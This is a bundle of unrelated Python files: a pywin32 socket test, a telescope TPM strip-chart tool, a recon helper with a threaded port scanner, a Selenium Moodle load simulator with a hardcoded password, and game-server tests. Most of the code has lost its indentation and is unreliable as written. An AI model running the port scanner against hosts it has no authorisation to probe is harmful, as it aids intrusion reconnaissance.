win32file.WSAEventSelect(
client,
client_event,
win32file.FD_CONNECT
| win32file.FD_READ
| win32file.FD_WRITE
| win32file.FD_CLOSE,
)
err = client.connect_ex(port.getsockname())
self.assertEquals(err, win32file.WSAEWOULDBLOCK)
res = win32event.WaitForSingleObject(port_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(port, port_event)
self.assertEquals(events, {win32file.FD_ACCEPT: 0})
server, addr = port.accept()
server.setblocking(0)
server_event = win32event.CreateEvent(None, 1, 0, None)
win32file.WSAEventSelect(
server,
server_event,
win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE,
)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CONNECT: 0, win32file.FD_WRITE: 0})
sent = 0
data = str2bytes("x") * 16 * 1024
while sent < 16 * 1024 * 1024:
try:
sent += client.send(data)
except socket.error as e:
if e.args[0] == win32file.WSAEINTR:
continue
elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS):
break
else:
raise
else:
self.fail("could not find socket buffer limit")
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(server, server_event)
self.assertEquals(events, {win32file.FD_READ: 0})
received = 0
while received < sent:
try:
received += len(server.recv(16 * 1024))
except socket.error as e:
if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]:
continue
else:
raise
self.assertEquals(received, sent)
events = win32file.WSAEnumNetworkEvents(server)
self.assertEquals(events, {})
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_WRITE: 0})
client.shutdown(socket.SHUT_WR)
res = win32event.WaitForSingleObject(server_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
# strange timing issues...
for i in range(5):
events = win32file.WSAEnumNetworkEvents(server, server_event)
if events:
break
win32api.Sleep(100)
else:
raise AssertionError("failed to get events")
self.assertEquals(events, {win32file.FD_CLOSE: 0})
events = win32file.WSAEnumNetworkEvents(client)
self.assertEquals(events, {})
server.close()
res = win32event.WaitForSingleObject(client_event, 1000)
self.assertEquals(res, win32event.WAIT_OBJECT_0)
events = win32file.WSAEnumNetworkEvents(client, client_event)
self.assertEquals(events, {win32file.FD_CLOSE: 0})
client.close()
events = win32file.WSAEnumNetworkEvents(port)
self.assertEquals(events, {})
if __name__ == "__main__":
testmain()
|
tpm_feed.py
|
#!/usr/bin/env python3
import tpmdata
import multiprocessing
import pprint
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import dates
from astropy.time import Time
from argparse import ArgumentParser
from matplotlib import animation
import astropy.units as u
__version__ = '3.0.1'
tpmdata.tinit()
def get_tpm_packet(out_dict):
data = tpmdata.packet(1, 1)
for key, val in data.items():
out_dict[key] = val
return 0
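# Every TPM query below runs get_tpm_packet in a short-lived subprocess, sharing
# results through a Manager dict and killing the worker if it does not finish
# within 2 seconds (presumably because tpmdata.packet can block when the TPM is
# unreachable). The helper below is an illustrative sketch of that repeated
# pattern; it is not referenced by the rest of this script.
def fetch_tpm_packet(timeout=2):
    """Fetch one TPM packet in a subprocess, raising if it doesn't answer in time."""
    data = multiprocessing.Manager().dict()
    proc = multiprocessing.Process(target=get_tpm_packet, args=(data,))
    proc.start()
    proc.join(timeout)
    if proc.is_alive():
        proc.kill()
        raise ConnectionError("Could not reach TPM")
    return dict(data)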
class StripChart:
def __init__(self, key, fig, ax):
self.key = key
# self.fig = plt.figure(figsize=(6, 4))
# self.ax = self.fig.gca()
self.fig = fig
self.ax = ax
self.formatter = dates.DateFormatter('%H:%M')
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
self.t0 = Time.now()
self.times = Time([data['ctime']], format='unix')
self.values = np.array([data[self.key]])
        self.line = self.ax.plot(self.times.plot_date, self.values)
self.ax.xaxis.set_major_formatter(self.formatter)
# self.fig.canvas.show()
# plt.draw()
def update(self, i):
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
self.times = Time(np.append(self.times, Time(data['ctime'],
format='unix')))
self.values = np.append(self.values, data[self.key])
sorter = np.argsort(self.times)
self.times = self.times[sorter]
self.values = self.values[sorter]
cutoff = self.times >= self.t0
self.times = self.times[cutoff]
self.values = self.values[cutoff]
if self.times.shape == (0,):
print('No times to plot')
return
self.ax.clear()
# print(self.times.to_datetime(), self.values)
self.ax.plot(self.times.to_datetime(), self.values, linewidth=3,
label=self.key)
self.ax.xaxis.set_major_formatter(self.formatter)
self.ax.axhline(self.values[0], c='r', linewidth=1,
label=f'Initial Value {self.key}')
self.ax.legend()
def parseargs():
parser = ArgumentParser(description='A tool to create strip charts using'
' the TPM')
parser.add_argument('-c', '--channels', nargs='+', default=['dewar_sp1_lb'],
help='Channel(s) to query and print')
parser.add_argument('-p', '--plot', action='store_true',
help='Channel(s) to plot')
parser.add_argument('-v', '--verbose', action='store_true')
parser.add_argument('--version', action='store_true')
    parser.add_argument('--dt', type=float, default=5,
                        help='Time interval between prints (used with'
                             ' --channels)')
    parser.add_argument('--list-channels', dest='list_channels',
                        action='store_true',
                        help='Prints a list of all queryable channels')
args = parser.parse_args()
return args
def main(args=None):
if args is None:
args = parseargs()
if args.list_channels:
args.channels = []
if args.version:
print(__version__)
if args.list_channels:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
pprint.pprint(data.keys())
if args.plot:
charts = []
anis = []
for channel in args.channels:
fig = plt.figure(figsize=(6, 4))
ax = fig.add_subplot(1, 1, 1)
chart = StripChart(channel, fig, ax)
print(args.dt * 1000)
anis.append(animation.FuncAnimation(fig, chart.update,
interval=args.dt * 1000))
charts.append(chart)
print('Close the plots to get a table feed')
plt.show()
if args.channels:
print()
print(f"{'Time':10}" + ''.join([' {:<12}'.format(channel)
for channel in args.channels]))
while True:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
old_t = Time(data['ctime'], format='unix')
new_t = old_t
loop_cond = True
while loop_cond:
data = multiprocessing.Manager().dict()
tpm_thread = multiprocessing.Process(
target=get_tpm_packet, args=(data,))
tpm_thread.start()
tpm_thread.join(2)
if tpm_thread.is_alive():
tpm_thread.kill()
raise ConnectionError("Could not reach TPM")
new_t = Time(data['ctime'], format='unix')
# print((new_t - old_t).to(u.s))
loop_cond = (new_t - old_t) < (args.dt * u.s)
print(f'{new_t.isot[11:19]:<10}' + ''.join([' {:12}'.format(
data[channel]) for channel in args.channels]))
if __name__ == '__main__':
main()
|
round.py
|
import random
import string
import socket
import threading
import dns.resolver as resolver
class ROUNDER:
PTHREADS = 0
PORTS = """21-23,25-26,53,81,110-111,113,135,139,143,179,199,445,465,514-515,548,554,587,646,993,995,1025-1027,
1433,1720,1723,2000-2001,3306,3389,5060,5666,5900,6001,8000,8008,8080,8443,8888,10000,32768,49152,49154"""
AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
FRESOL = "{:<18.15}"
FCODE = "{:<18.17}"
FSERVER = "{:<21.20}"
FSUBDOM = "{:<%i.%i}"
FPORTS = "{:<21.20}"
FSIMIL = "{:<10.9}"
FCNAME = "{:<}"
def rstring( self, strlen = 10 ):
letters = string.ascii_lowercase
return ''.join( random.choice(letters) for i in range( strlen ) )
def maxcountp( self, tocut, tosolve, toadd='', _count = 16 ):
for _ls in tosolve:
if len( _ls[: -len( toadd + tocut ) ] ) > _count:
_count = len( _ls[: -len( toadd + tocut ) ] )
return _count + 1
def fmreplsb( self, toput ):
self.FSUBDOM = self.FSUBDOM % ( toput, toput + 1 )
return
def seperator(self, code, headers):
_polls = {
'cd': 'ERR',
'sv': '',
}
if code:
_polls['cd'] = code
if headers:
headers = dict(headers)
if "Server" in list(headers.keys()):
_polls['sv'] = headers.get("Server")
return _polls
def iplocator(self, hostname, defip):
_ip = ''
try:
toput = socket.gethostbyname( hostname )
_ip = toput
except Exception as e:
pass
return _ip
def cnlocator(self, hostname, defcn):
_cn = ''
try:
aa = resolver.query( hostname, "CNAME" )
if aa:
return str( aa[ 0 ] )
return _cn
except:
return _cn
    def ptlocator(self, hostname, pts, retlist=None):
        # Use a fresh list per call; a mutable default argument would leak
        # results between successive scans.
        if retlist is None:
            retlist = []
        def connector(pt, sclass):
            sclass.PTHREADS += 1
            s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
            s.settimeout( 5 )
            try:
                s.connect( (hostname, pt) )
                retlist.append( str(pt) )
            except:
                pass
            finally:
                s.close()
                sclass.PTHREADS -= 1
        for pt in pts:
            _t = threading.Thread( target=connector, args=(pt, self) )
            _t.daemon = True
            _t.start()
            # Throttle to at most 6 concurrent connection attempts.
            while self.PTHREADS >= 6:
                pass
        while self.PTHREADS > 0:
            pass
        return list(set(retlist))
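    # Illustrative usage of ptlocator (not part of the original class): the PORTS
    # constant above would typically be expanded into a flat list of ints first,
    # e.g.
    #   ports = []
    #   for part in ROUNDER.PORTS.replace("\n", "").split(","):
    #       lo, _, hi = part.strip().partition("-")
    #       ports.extend(range(int(lo), int(hi or lo) + 1))
    #   open_ports = ROUNDER().ptlocator("example.com", ports)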
def formatrsv(self, ip, defip, cplate):
if ip == defip:
return cplate[ 'YELLOW' ] + self.FRESOL.format( ip ) + cplate[ 'END' ]
else:
return cplate[ 'RED' ] + cplate[ 'BOLD' ] + self.FRESOL.format( ip ) + cplate[ 'END' ]
    def formatcdv(self, ca, cb, cplate):
        def code( _code ):
            # Always return a formatted string, including for the "ERR" sentinel,
            # so the concatenation below never has to deal with None.
            if _code != "ERR":
                _code = int( _code )
                if 200 <= _code < 300:
                    return cplate[ 'GREEN' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
                elif 300 <= _code < 400:
                    return cplate[ 'YELLOW' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
                elif 400 <= _code < 600:
                    return cplate[ 'RED' ] + cplate[ 'BOLD' ] + "{:<3.3}".format( str( _code ) ) + cplate[ 'END' ]
            return "{:<3.3}".format( str( _code ) )
        return "{:<1.1}".format("[") + code( ca ) + "{:<1.1}".format("/") + code( cb ) + "{:<10.10}".format("]")
def formatsvv(self, sa, sb, cplate):
def server( _s1, _s2 ):
if _s1 != "NONE" and _s2 != "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s2 ) + cplate[ 'END' ]
elif _s1 == "NONE" and _s2 != "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s2 ) + cplate[ 'END' ]
elif _s1 != "NONE" and _s2 == "NONE":
return cplate[ 'BLUE' ] + cplate[ 'BOLD' ] + self.FSERVER.format( _s1 ) + cplate[ 'END' ]
else:
return self.FSERVER.format( _s1 )
return server( sa, sb )
def formatsbv( self, domain, subdomain ):
return self.FSUBDOM.format( subdomain.replace( "." + domain, "" ) )
def formatptv( self, _ports, cplate, stcount=20):
tlen = len( ",".join( [str(pt) for pt in _ports] ) )
if tlen > stcount:
ff = ",".join( [str(pt) for pt in _ports] )[ :stcount ]
else:
ff = ",".join( [str(pt) for pt in _ports] )
return cplate[ 'YELLOW' ] + self.FPORTS.format( ff ) + cplate[ 'END' ]
def formatcnv( self, _cname, cplate ):
return cplate[ 'BOLD' ] + cplate[ 'GREEN' ] + _cname + cplate[ 'END' ]
|
main.py
|
import os
import json
import random
import threading
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
from webdriver_manager.chrome import ChromeDriverManager
def generate(users, courses):
"""
    Pick a random username and a random course for one simulated session
    Parameters
    ----------
    users : list
        Usernames to choose from
    courses : list
        Course IDs to choose from
    Return
    ------
    String, String
        A random username and a random course
"""
username = random.choice(users)
course = random.choice(courses)
return username,course
def login(uri, driver, username, password):
"""
Login function
Parameters
----------
uri : string
The host URI
driver : Selenium webdriver
A webdriver object to control browser with
username : string
A username string
password : string
The user's password
Return
------
None
"""
driver.implicitly_wait(3)
driver.get(uri)
driver.find_element(By.XPATH, '//*[@id="page-wrapper"]/nav/ul[2]/li[2]/div/span/a').click()
driver.find_element(By.ID, "username").send_keys(username)
driver.find_element(By.ID, "password").send_keys(password)
driver.find_element(By.ID, "loginbtn").click()
try:
driver.find_element(By.XPATH, '/html/body/span/div/div/div[4]/button[3]').click()
print("Tutorial modal found and dismissed")
except:
print("No tutorial modal")
def logout(uri, driver):
"""
Logout function
Parameters
----------
    uri : string
        The host URI
    driver : Selenium webdriver
        A webdriver object to control browser with
Return
------
None
"""
print("Logging out user")
driver.find_element(By.XPATH, "//a[contains(@aria-label, 'User menu')]").click()
driver.find_element(By.XPATH, "//a[contains(@href, 'logout.php')]").click()
def rng1(driver, course):
"""
Accesses a course passed in
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
course : string
A course string
Return
------
None
"""
print("RNG 1: Access course")
driver.find_element(By.XPATH, "//a[contains(@href, 'course/view.php?id=" + course + "')]").click()
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng2(driver, uri):
"""
Accesses a random user's profile (ID between 2, 1000)
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
uri : string
The host URI
Return
------
None
"""
print("RNG 2: Access user")
userid = str(random.choice(range(2, 1000)))
driver.get(uri + "/user/view.php?id=" + userid)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng3(driver, uri, course):
"""
Accesses a random user's profile (ID between 2, 1000) also enrolled in course
Parameters
----------
driver : Selenium webdriver
A webdriver object to control browser with
uri : string
The host URI
course : string
A course string
Return
------
None
"""
print("RNG 3: Access user in course")
userid = str(random.choice(range(2, 1000)))
driver.get(uri + "/user/view.php?id=" + userid + "&course=" + course)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
def rng4(driver, uri, path):
"""
    Opens course ID 9 and submits an essay for the logged-in user, either as
    online text or as an uploaded Essay.odt depending on path
    Parameters
    ----------
    driver : Selenium webdriver
        A webdriver object to control browser with
    uri : string
        The host URI
    path : bool
        True submits the essay as online text, False uploads Essay.odt
Return
------
None
"""
print("Getting course 9")
driver.find_element(By.XPATH, "//a[contains(@href, 'course/view.php?id=9')]").click()
print("On course ID 9")
driver.implicitly_wait(2)
try:
driver.find_element(By.XPATH, "/html/body/span/div/div/div[4]/button[3]").click()
print("Course tutorial modal found and dismissed")
except:
print("No tutorial modal")
driver.implicitly_wait(2)
print("Selecting assignment")
driver.find_element(By.XPATH, "//a[contains(@href, 'assign/view.php?id=140')]").click()
driver.implicitly_wait(2)
try:
print("Trying to remove old submission")
driver.find_element(By.XPATH, "//button[contains(text(), 'Remove submission')]").click()
driver.implicitly_wait(0.5)
driver.find_element(By.XPATH, "//button[contains(text(), 'Continue')]").click()
driver.implicitly_wait(0.5)
driver.find_element(By.XPATH, "//button[contains(text(), 'Edit submission')]").click()
except:
print("Unable to remove old submission (maybe it doesn't exist). Adding instead.")
print("Selecting Add submission button")
driver.find_element(By.XPATH, "//button[contains(text(), 'Add submission')]").click()
driver.implicitly_wait(0.5)
# True is online text, false is upload
    if path:
print("Uploading in web editor")
essay = ""
with open('./essay.txt', 'r') as f:
essay = f.read()
print("Essay preview: " + essay[0:50])
driver.find_element(By.ID, "id_onlinetext_editoreditable").click()
actions = ActionChains(driver)
actions.send_keys(essay)
actions.perform()
#driver.find_element(By.ID, "id_onlinetext_editor").send_keys(essay)
#driver.find_element(By.ID, "id_onlinetext_editor").send_keys(essay)
else:
print("Uploading as document")
essay = "./Essay.odt"
driver.find_element(By.XPATH, "//a[contains(@title, 'Add...')]").click()
driver.implicitly_wait(1)
driver.find_element(By.XPATH, "//span[contains(text(), 'Upload a file')]").click()
driver.implicitly_wait(1)
print("Sending essay string")
driver.find_element(By.XPATH, "//input[@type='file']").send_keys(os.getcwd() + "/" + essay)
print("Essay string sent")
print("Uploading file")
driver.find_element(By.XPATH, "//button[contains(text(), 'Upload this file')]").click()
driver.implicitly_wait(2)
print("Submitting essay")
driver.find_element(By.XPATH, "//input[contains(@name, 'submitbutton')]").click()
print("Essay submitted")
def simaction(rngaction, rng4action, threads, driver, service, options, uri, users, courses, password):
try:
driver.set_window_size(1366, 1060)
print("Generating random username and course")
username, course = generate(users, courses)
login(uri, driver, username, password)
driver.implicitly_wait(5)
print("RNG action " + str(rngaction))
if (rngaction == 1):
rng1(driver, course)
elif (rngaction == 2):
rng2(driver, uri)
elif (rngaction == 3):
rng3(driver, uri, course)
elif (rngaction == 4):
path = rng4action
rng4(driver, uri, rng4action)
else:
rng1(driver, course)
logout(uri, driver)
print("Destroying driver")
driver.quit()
print("Driver destroyed")
    except Exception as exc:
        # Report the failure and still attempt to clean up the driver.
        print("Simulated action failed: " + str(exc))
        try:
            driver.quit()
        except Exception:
            print("No driver to destroy")
def main():
print("Initializing options")
options = Options()
print("Adding options: headless")
options.add_argument('--headless')
print("Creating service")
service = Service(ChromeDriverManager().install())
uri = "http://192.168.122.61"
print("Set URI to" + uri)
print("Creating users list from usernames.json")
users = json.loads(open("usernames.json").read())
print("Creating courses list from courses.json")
courses = json.loads(open("courses.json").read())
print("Setting global user password")
password = "Kenyon5%"
while True:
print("Initializing threads")
numthreads = 10
threads = []
print("Initializing path choice")
action = random.choice([1,1,1,1,2,2,3,4,4,4,4])
rng4action = random.choice([True, False])
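        # The action list is weighted: course access (1) and essay submission (4)
        # each occur with probability 4/11, user lookup (2) with 2/11, and
        # course-member lookup (3) with 1/11; rng4action picks between the online
        # text path and the Essay.odt upload path for action 4.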
print("Initializing " + str(numthreads) + " drivers indexed at 0")
drivers = []
for i in range(numthreads):
print("Initializing driver " + str(i))
drivers.append(webdriver.Chrome(service = service, options = options))
print("Initialized driver " + str(i))
print("Initialized thread environment")
for i in range(numthreads):
t = threading.Thread(target = simaction, args = (action, rng4action, numthreads, drivers[i], service, options, uri, users, courses, password))
print("Initialized thread")
t.daemon = True
threads.append(t)
        for i in range(numthreads):
            print("Starting thread " + str(i))
            threads[i].start()
        for i in range(numthreads):
            print("Joining thread " + str(i))
            threads[i].join()
if __name__ == "__main__":
main()
|
test_server.py
|
# Test Server / Client Communication
import pytest, time, threading, socket
import socketio
from socketio.client import Client
from socketio.server import Server
import server, client
from server import Client as cs_client
##### Variables and global Server object #####
HOST = '127.0.0.1'
PORT = 5000
# Server object is instantiated outside of test scope as there is no shutdown feature
SERVER = server.CommunicationServer(8)
SERVER.CreateServer(HOST,PORT)
##### FIXTURES #####
# Client Instances Fixture
# Argument: Number of Clients to create
# Return: List of instantiated Client objects
@pytest.fixture
def ClientInstances(NoClients):
Instances = []
for element in range(NoClients):
Instances.append(client.Player())
return Instances
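# NoClients is not defined as a fixture here; each test supplies it through its
# @pytest.mark.parametrize('NoClients', [...]) marker, and pytest resolves that
# value before building the ClientInstances fixture.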
def delayedSendinformation(client, msg, delay):
print('Executing delayed message in: ', str(delay), ' seconds')
time.sleep(delay)
client.SendInformationToOpponent(msg)
print('Message sent, exiting thread...')
def clean_server():
SERVER.Clients = []
SERVER.ActiveGames = []
SERVER.TournamentGames = []
SERVER.ConcludedGames = []
SERVER.TournamentStarted = False
##### TESTS #####
def test_AI():
clean_server()
SERVER.AddAI()
SERVER.AddAI()
assert SERVER.GetNumPlayers() == 2
for i in range(2):
SERVER.Clients.append(cs_client(str(i)))
SERVER.generateTournament()
assert len(SERVER.TournamentGames) == 6
SERVER.generateRound()
#Check that AI games are skipped
assert len(SERVER.ActiveGames) == 1
assert len(SERVER.ConcludedGames) == 1
assert SERVER.Clients[0].get_id() != SERVER.Clients[1].get_id()
#Check that AIs are AI
assert SERVER.Clients[0].isAI
assert SERVER.Clients[1].isAI
#Check that players are not AI
assert not SERVER.Clients[2].isAI
assert not SERVER.Clients[3].isAI
#Server unit tests - no events
def test_server_unit():
clean_server()
#Fill Clients with dummies
for i in range(8):
SERVER.Clients.append(cs_client(str(i)))
assert SERVER.GetNumPlayers() == 8
#Try generating a tournament
SERVER.generateTournament()
assert len(SERVER.TournamentGames) == 28
#Try generating a round
SERVER.generateRound()
assert len(SERVER.TournamentGames) == 24
assert len(SERVER.ActiveGames) == 4
#Test generate new games while tournament is going
assert SERVER.generateRound() == -1
assert SERVER.generateTournament() == -1
#Check all players are in a game
for i in range(8):
assert SERVER.FindActiveGameBySid(str(i)) != None
game = SERVER.FindActiveGameBySid('1')
opponent = 0
if(game.PlayerA.get_id() == '1'):
opponent = game.PlayerB
else:
opponent = game.PlayerA
#Test removing game
SERVER.ActiveGames.remove(game)
assert SERVER.FindActiveGameBySid('1') == None
assert SERVER.FindActiveGameBySid(opponent.get_id()) == None
for i in range(6):
SERVER.ActiveGames = []
assert SERVER.generateRound() == 0
assert len(SERVER.ActiveGames) == 4
assert len(SERVER.TournamentGames) == 0
@pytest.mark.parametrize('NoClients', [8])
def test_Tournament_logic(ClientInstances, NoClients):
clean_server()
#Connect all clients
for client in ClientInstances:
assert client.ConnectToServer(HOST, PORT) == 0
client0 = ClientInstances[0]
client0_playerinfo = SERVER.Clients[0].PlayerInfo
assert client0_playerinfo.GamesLeft == 0
assert client0_playerinfo.GamesPlayed == 0
assert client0_playerinfo.NumberOfWins == 0
#Ready up all players
for client in ClientInstances:
assert client.Ready() == 0
assert client0_playerinfo.GamesLeft == 7
#Make sure tournament started
assert len(SERVER.TournamentGames) == 24
assert len(SERVER.ActiveGames) == 4
client0.SignalVictory()
#Check PlayerInfo Updates
assert client0_playerinfo.GamesLeft == 6
assert client0_playerinfo.GamesPlayed == 1
assert client0_playerinfo.NumberOfWins == 1
#Check that game concluded and moved to ConcludedGames
assert len(SERVER.ActiveGames) == 3
assert len(SERVER.ConcludedGames) == 1
client0_game = SERVER.ConcludedGames[0]
#Get client0 opponent
opponent = None
if client0_game.PlayerA == SERVER.Clients[0]:
opponent = client0_game.PlayerB
else:
opponent = client0_game.PlayerA
opponent_index = SERVER.Clients.index(opponent)
assert ClientInstances[opponent_index].SignalVictory() == -1
#Set client0_game as last game
SERVER.ActiveGames = []
SERVER.ActiveGames.append(client0_game)
client0_game.Active = True
#Check if client_0 wins on disconnect
assert ClientInstances[opponent_index].Disconnect() == 0
time.sleep(0.5)
assert client0_playerinfo.GamesLeft == 5
assert client0_playerinfo.GamesPlayed == 2
assert client0_playerinfo.NumberOfWins == 2
#Check that players can retrieve their player info
playerinfo = client0.GetPlayerInfo()
assert playerinfo is not None
assert playerinfo['GamesLeft'] == 5
assert playerinfo['GamesPlayed'] == 2
assert playerinfo['NumberOfWins'] == 2
#Check if new round started when last game concluded
assert len(SERVER.TournamentGames) == 15 # requirements from Group D
assert len(SERVER.ActiveGames) == 3
for client in ClientInstances:
client.Disconnect()
# Test Client Matching and Sending Data
@pytest.mark.parametrize('NoClients', [8])
def test_ClientMessaging(ClientInstances, NoClients):
clean_server()
Client_1 = ClientInstances[0]
Client_2 = ClientInstances[1]
GameState = {'Data':'Message','Error':None}
# Connect Clients to server
assert Client_1.ConnectToServer(HOST,PORT) == 0
assert Client_2.ConnectToServer(HOST,PORT) == 0
# Both Clients Ready up (Should start a match between them)
Client_1.Ready()
Client_2.Ready()
time.sleep(2)
    # Assert that neither client has received any messages
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
# Create a thread that sends a message from client 1 to client 2 after 2 seconds
message = {'Action':'Left','Error':None}
thread = threading.Thread(target=delayedSendinformation, args=[Client_1,message,2])
thread.start()
# Fetch Data and assert that timeout did not occur
timeout = time.time() + 30
data_2 = Client_2.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
data_1 = Client_1.GetMessageFromOpponent(blocking = False)
    # Both Clients should have cleared their message queues after getting messages
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
print('Data 1')
print(data_1)
print('Data 2')
print(data_2)
    # Assert that client 2 has received data, and that message was correct
assert len(data_1) == 0
assert len(data_2) == 1
assert data_2[0]['data']['Action'] == 'Left'
    assert data_2[0]['data']['Error'] is None
    # Get messages again, should receive nothing
data_1 = Client_1.GetMessageFromOpponent(blocking = False)
data_2 = Client_2.GetMessageFromOpponent(blocking = False)
assert len(data_1) == 0
assert len(data_2) == 0
# Test sending more messages
msg_1 = {'msg_1':'packet_1'}
msg_2 = {'msg_2':-1}
msg_3 = {'msg_3':0.5}
Client_2.SendInformationToOpponent(msg_1)
Client_2.SendInformationToOpponent(msg_2)
Client_2.SendInformationToOpponent(msg_3)
Client_1.SendInformationToOpponent(msg_1)
Client_1.SendInformationToOpponent(msg_2)
time.sleep(1)
timeout = time.time() + 30
data_1 = Client_1.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
data_2 = Client_2.GetMessageFromOpponent(blocking = False)
print('Data in Client 1: ')
print(data_1)
print('Data in Client 2: ')
print(data_2)
assert len(data_1) == 3
assert len(data_2) == 2
assert len(Client_1.MessageQue) == 0
assert len(Client_2.MessageQue) == 0
assert data_1[0]['data']['msg_1'] == 'packet_1'
assert data_1[1]['data']['msg_2'] == -1
assert data_1[2]['data']['msg_3'] == 0.5
assert data_2[0]['data']['msg_1'] == 'packet_1'
assert data_2[1]['data']['msg_2'] == -1
# Test many messages in quick succession
for i in range(20):
Client_2.SendInformationToOpponent({'packet':i})
time.sleep(1)
timeout = time.time() + 30
data_1 = Client_1.GetMessageFromOpponent(blocking = True, timeout = 60)
assert time.time() < timeout
for i in range(20):
assert data_1[i]['data']['packet'] == i
for client in ClientInstances:
client.Disconnect()
# Test Client Connections and Server Capacity
@pytest.mark.parametrize('NoClients', [16])
def test_ClientConnect(ClientInstances, NoClients):
clean_server()
# List of indices in ClientInstances list
Set = [0,1,2,3,4,5,6,7]
for i in Set:
# Assert that client connection attempt returns 0
assert ClientInstances[i].ConnectToServer(HOST,PORT) == 0
time.sleep(0.1)
# Check that server has 8 clients connected
assert len(SERVER.Clients) == 8
Set = [8,9,10,11]
for i in Set:
# Assert that client connection attempt returns -1
assert ClientInstances[i].ConnectToServer(HOST,PORT) == -1
time.sleep(0.1)
# Check that server did not connect any more clients
assert len(SERVER.Clients) == 8
Set = [0,1,2,3]
for i in Set:
ClientInstances[i].Disconnect()
time.sleep(0.1)
# Check that server registered 4 client disconnects
assert len(SERVER.Clients) == 4
Set = [8,9,10,11]
for i in Set:
assert ClientInstances[i].ConnectToServer(HOST,PORT) == 0
time.sleep(0.1)
assert len(SERVER.Clients) == 8
# Assert client connection failed & capacity = 8
assert ClientInstances[12].ConnectToServer(HOST,PORT) == -1
assert SERVER.MaxConcurrentClients == 8
# Increment server capacity by 2
SERVER.MaxConcurrentClients += 2
time.sleep(0.1)
# Check that capacity was incremented
assert SERVER.MaxConcurrentClients == 10
# Assert that two more clients can connect, but fail on third
assert ClientInstances[12].ConnectToServer(HOST,PORT) == 0
assert ClientInstances[13].ConnectToServer(HOST,PORT) == 0
assert ClientInstances[14].ConnectToServer(HOST,PORT) == -1
time.sleep(0.1)
# Check that server has 10 clients connected
assert len(SERVER.Clients) == 10
# Disconnect 2 Clients
ClientInstances[12].Disconnect()
ClientInstances[13].Disconnect()
# Decrement server capacity
SERVER.MaxConcurrentClients -= 2
time.sleep(0.1)
assert SERVER.MaxConcurrentClients == 8
time.sleep(0.1)
assert len(SERVER.Clients) == 8
# Disconnect all clients
for client in ClientInstances:
client.Disconnect()
# Final Sleep to allow disconnections to finalize
time.sleep(0.1)
@pytest.mark.parametrize('NoClients', [8])
def test__concludePlayerGames(ClientInstances, NoClients):
clean_server()
order = [0, 3, 5, 2, 1, 4, 7, 6]
wins = dict(zip(order, range(len(order))))
for client in ClientInstances:
client.ConnectToServer(HOST, PORT)
clients = [client for client in SERVER.Clients]
SERVER.StartGame()
for idx in order:
ClientInstances[idx].Disconnect()
for idx, client in enumerate(clients):
assert client.PlayerInfo.GamesPlayed == len(order) - 1
assert client.PlayerInfo.NumberOfWins == wins[idx]
@pytest.mark.parametrize('NoClients', [8])
def test_join_server_after_tournament(ClientInstances, NoClients):
clean_server()
for client in ClientInstances[:-1]:
client.ConnectToServer(HOST, PORT)
